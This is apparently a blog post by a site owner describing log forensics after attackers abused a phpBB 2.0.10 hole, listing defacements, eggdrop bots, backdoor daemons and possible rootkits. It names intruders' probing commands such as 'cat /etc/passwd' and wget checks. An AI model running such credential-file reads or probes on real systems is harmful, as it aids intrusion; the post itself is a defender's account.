Plaidophile

Now that I know about (and have fixed) that little teeny tiny hole in phpBB, I've gone back and looked at the logs... it looks more like there have been a fuckton of people abusing trikuare.cx in that way, going all the way back to November 18 when the exploit was first announced. Whee. Lots of it is going through open proxies which appear to have been installed on other systems, too.

Most of it was fairly innocuous (like, cat /etc/passwd which does absolutely fuck-all on a system which uses shadow passwords), but there's lots and lots of other stuff too.

Honestly, I'm surprised that my site wasn't totally decimated or anything (and that nothing truly evil was installed before the 26th), and that there weren't a bunch of rootkits installed and so on. It also looks like it was all going through the same stupid wrapper script, and it was all done by a bunch of stupid kids who just wanted to prove that they, too, were 1337 h4x0rs or whatever. Yeah, like running other peoples' scripts after doing a websearch on "phpBB 2.0.10" is so hard, and shows off j00r m4d sk1llz. Awesome, dudes.

Anyway, doing some forensics on the logs that I still have (meaning, up to when they installed the new httpd) finds a lot of boring stuff:

• lots of ls -l, cat /etc/passwd, and other stupid stuff which wouldn't really do anything useful
• lots of testing what stuff is installed (by running wget, uname, etc.)
• lots of website defacements which failed, because they all tried writing index.htm when my site uses index.html for everything
• a couple of website defacements which should have succeeded, so it could be that my site's index page simply read "esses hackers de hj em dia apenas o un-root para fazer diferenca" for a few days without anyone noticing or bringing it to my attention
• attempts at defacing other sites hosted on this host (of course, this all runs under suexec and my account has no access to writing in it)
• things which show that they actually did do a fairly good job of probing for where things are kept, like my docroot and the global host docroot and so on (though I don't know if the global docroot is in the standard Gentoo location or something)
• The successful installation (and probably successful execution) of various eggdrop bots (which weren't running yesterday, but that's probably because the webhost had been rebooted due to mysterious circumstances a few days prior, possibly in turn due to this crap)
• lots and lots and lots of calls to w (nothing like some healthy paranoia, which turned out to be unnecessary since neither myself nor the admin are good at checking the process list, heh)
• the installation of lots of scary stuff, like daemons which allowed people to remotely login (probably without a password), portsentry, possible rootkits (who were used to do who knows what before the admin upgraded the kernel to the latest version, which happened to fix that mmap() security hole which lots of things have exploited lately)

Just think, if one of these kids who are so well-organized and hell-bent on finding every little security hole on the Internet had a conscience and actually told site admins that their site was susceptible to a hacking, none of that would have happened.

Meh. People suck.